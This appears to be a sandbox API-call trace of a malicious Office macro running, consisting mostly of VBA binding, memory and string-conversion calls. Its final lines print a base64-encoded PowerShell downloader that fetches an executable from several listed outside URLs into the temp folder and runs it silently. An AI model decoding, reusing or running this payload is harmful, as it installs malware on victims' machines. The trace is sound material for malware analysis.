szName="bR5onNk", lHashVal=0x108ce8, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x86e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x86e) returned 0x0 [0061.110] CRetailMalloc_Realloc () returned 0x88a8460 [0061.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b1722, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="CYWnIyS") returned 8 [0061.111] ITypeComp:RemoteBind (in: This=0x87cef08, szName="CYWnIyS", lHashVal=0x10f8ca, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x8fc | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x8fc) returned 0x0 [0061.111] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.113] CRetailMalloc_Alloc () returned 0x87504e0 [0061.113] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xadc001a, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_qEXUTkvp1") returned 17 [0061.114] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_qEXUTkvp1", lHashVal=0x104ee8, wFlags=0x3, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b1a1e, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="Fos0eYFkQ") returned 10 [0061.114] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Fos0eYFkQ", lHashVal=0x102357, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x924 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x924) returned 0x0 [0061.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b1a1e, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="Fos0eYFkQ") returned 10 [0061.115] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Fos0eYFkQ", lHashVal=0x102357, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x924 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x924) returned 0x0 [0061.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b1a1e, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="Fos0eYFkQ") returned 10 [0061.115] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Fos0eYFkQ", lHashVal=0x102357, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x924 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x924) returned 0x0 [0061.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b2296, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="zI8LiKky") returned 9 [0061.121] ITypeComp:RemoteBind (in: This=0x87ce890, szName="zI8LiKky", lHashVal=0x1041d9, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x998 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x998) returned 0x0 [0061.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b2296, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="zI8LiKky") returned 9 [0061.122] ITypeComp:RemoteBind (in: This=0x87ce668, szName="zI8LiKky", lHashVal=0x1041d9, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x998 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x998) returned 0x0 [0061.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b2296, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="zI8LiKky") returned 9 [0061.122] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="zI8LiKky", lHashVal=0x1041d9, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x998 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x998) returned 0x0 [0061.124] CRetailMalloc_Realloc () returned 0x88bbee0 [0061.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b2542, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="PuFr9jw") returned 8 [0061.124] ITypeComp:RemoteBind (in: This=0x87ce890, szName="PuFr9jw", lHashVal=0x10bf5c, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x9bc | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x9bc) returned 0x0 [0061.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b2542, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="PuFr9jw") returned 8 [0061.124] ITypeComp:RemoteBind (in: This=0x87ce668, szName="PuFr9jw", lHashVal=0x10bf5c, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x9bc | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x9bc) returned 0x0 [0061.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b2542, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="PuFr9jw") returned 8 [0061.124] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="PuFr9jw", lHashVal=0x10bf5c, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x9bc | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x9bc) returned 0x0 [0061.126] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xadc101a, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_zjkaxp") returned 14 [0061.126] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_zjkaxp", lHashVal=0x10e5a8, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56b26ea, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="aluOvP") returned 7 [0061.126] ITypeComp:RemoteBind (in: This=0x87cef08, szName="aluOvP", lHashVal=0x105ad0, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x9d2 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x9d2) returned 0x0 [0061.126] CRetailMalloc_Alloc () returned 0x87fcc50 [0061.130] CRetailMalloc_Alloc () returned 0x87504e0 [0061.145] CRetailMalloc_Realloc () returned 0x87284a0 [0061.176] CRetailMalloc_Realloc () returned 0x88a8460 [0061.213] CRetailMalloc_Realloc () returned 0x76fc6a8 [0061.216] CRetailMalloc_Realloc () returned 0x8876ab0 [0061.216] CRetailMalloc_Realloc () returned 0x88b8468 [0061.216] CRetailMalloc_Realloc () returned 0x88b8468 [0061.216] CRetailMalloc_Realloc () returned 0x88b8468 [0061.217] CRetailMalloc_Realloc () returned 0x88b8468 [0061.217] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.217] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.217] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.217] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.218] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.218] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.218] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.218] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.219] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.219] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.219] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.219] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.219] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.221] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.222] CRetailMalloc_Realloc () returned 0x88f0ef8 [0061.223] CRetailMalloc_Realloc () returned 0x88f0ef8 [0061.223] CRetailMalloc_Realloc () returned 0x88f0ef8 [0061.224] CRetailMalloc_Realloc () returned 0x88f0ef8 [0061.224] CRetailMalloc_Realloc () returned 0x88f6f08 [0061.225] CRetailMalloc_Realloc () returned 0x88f6f08 [0061.225] CRetailMalloc_Realloc () returned 0x88f6f08 [0061.226] CRetailMalloc_Realloc () returned 0x88f6f08 [0061.226] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.226] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.226] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.226] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.226] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.227] CRetailMalloc_Realloc () returned 0x88ebee8 [0061.233] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0061.233] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0061.234] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.235] GetProcAddress (hModule=0x74e20000, lpProcName=0x2c8) returned 0x7502fcf8 [0061.235] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.235] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0061.236] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0061.237] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.238] GetProcAddress (hModule=0x74e20000, lpProcName=0x2c5) returned 0x7502f898 [0061.241] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.241] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0061.241] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0061.242] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.243] GetProcAddress (hModule=0x74e20000, lpProcName=0x2cd) returned 0x7501f4a9 [0061.244] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.244] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0061.244] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x74e20000 [0061.245] SetErrorMode (uMode=0x8001) returned 0x8001 [0061.246] GetProcAddress (hModule=0x74e20000, lpProcName=0x268) returned 0x74ea46c2 [0061.247] GetAsyncKeyState (vKey=3) returned 0 [0061.247] SafeArrayAllocData (psa=0x344500) returned 0x0 [0061.247] SafeArrayAllocData (psa=0x344538) returned 0x0 [0061.247] SafeArrayAllocData (psa=0x34451c) returned 0x0 [0061.247] SafeArrayAllocData (psa=0x3444e4) returned 0x0 [0061.247] GetAsyncKeyState (vKey=3) returned 0 [0061.248] VarCmp (pvarLeft=0x344498, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0061.248] VarCmp (pvarLeft=0x344498, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0061.248] VarCmp (pvarLeft=0x344498, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0061.248] VarCmp (pvarLeft=0x344448, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0061.248] VarCmp (pvarLeft=0x344448, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0061.248] VarCmp (pvarLeft=0x344448, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0061.248] VarCmp (pvarLeft=0x3443f8, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0061.248] VarCmp (pvarLeft=0x3443c8, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0061.248] VarCmp (pvarLeft=0x3443c8, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0061.248] VarCmp (pvarLeft=0x3443c8, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0061.249] VarCmp (pvarLeft=0x344368, pvarRight=0x3444a8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0061.249] VarBstrCat (in: bstrLeft="", bstrRight="", pbstrResult=0x33f3dc | out: pbstrResult=0x33f3dc) returned 0x0 [0061.249] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0061.250] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.251] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0061.251] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.252] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.252] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.253] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.253] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.253] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.254] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.254] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.255] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.255] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.255] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.256] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.256] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.257] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.257] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.257] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.258] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.258] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.259] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.259] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.260] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.260] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.260] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.261] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.261] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.262] LoadStringA (in: hInstance=0x74cf0000, uID=0x8db0, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="True") returned 0x4 [0061.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0061.262] LoadStringA (in: hInstance=0x74cf0000, uID=0x8dad, lpBuffer=0x33ef30, cchBufferMax=500 | out: lpBuffer="False") returned 0x5 [0061.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0061.275] atoi (_Str="1252") returned 1252 [0061.276] SysStringLen (param_1="cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9jYXJiZXlvbmRzdG9yZS5jb20vY2lhbnJmdC8saHR0cDovL3B4cGdyYXBoaWNzLmNvbS9lc3B6eXVydC8saHR0cDovL25vbmlldXJvLmNvbS94YXVxdC8saHR0cDovL3N0dWRpb2dpZi5jb20uYnIvamVkdHZ1emlreS8saHR0cDovL21vdG9yZ2lybHN0di5jb20va2RtLycuU3BsaXQoJywnKTskbmFtZSA9ICRyYW5kb20ubmV4dCgxLCA2NTUzNik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZXhlJztmb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeXskd2ViY2xpZW50LkRvd25sb2FkRmlsZSgkdXJsLlRvU3RyaW5nKCksICRwYXRoKTtTdGFydC1Qcm9jZXNzICRwYXRoO2JyZWFrO31jYXRjaHt3cml0ZS1ob3N0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlO319") returned 0x2d8 [0061.276] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9jYXJiZXlvbmRzdG9yZS5jb20vY2lhbnJmdC8saHR0cDovL3B4cGdyYXBoaWNzLmNvbS9lc3B6eXVydC8saHR0cDovL25vbmlldXJvLmNvbS94YXVxdC8saHR0cDovL3N0dWRpb2dpZi5jb20uYnIvamVkdHZ1emlreS8saHR0cDovL21vdG9yZ2lybHN0di5jb20va2RtLycuU3BsaXQoJywnKTskbmFtZSA9ICRyYW5kb20ubmV4dCgxLCA2NTUzNik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZXhlJztmb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeXskd2ViY2xpZW50LkRvd25sb2FkRmlsZSgkdXJsLlRvU3RyaW5nKCksICRwYXRoKTtTdGFydC1Qcm9jZXNzICRwYXRoO2JyZWFrO31jYXRjaHt3cml0ZS1ob3N0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlO319", 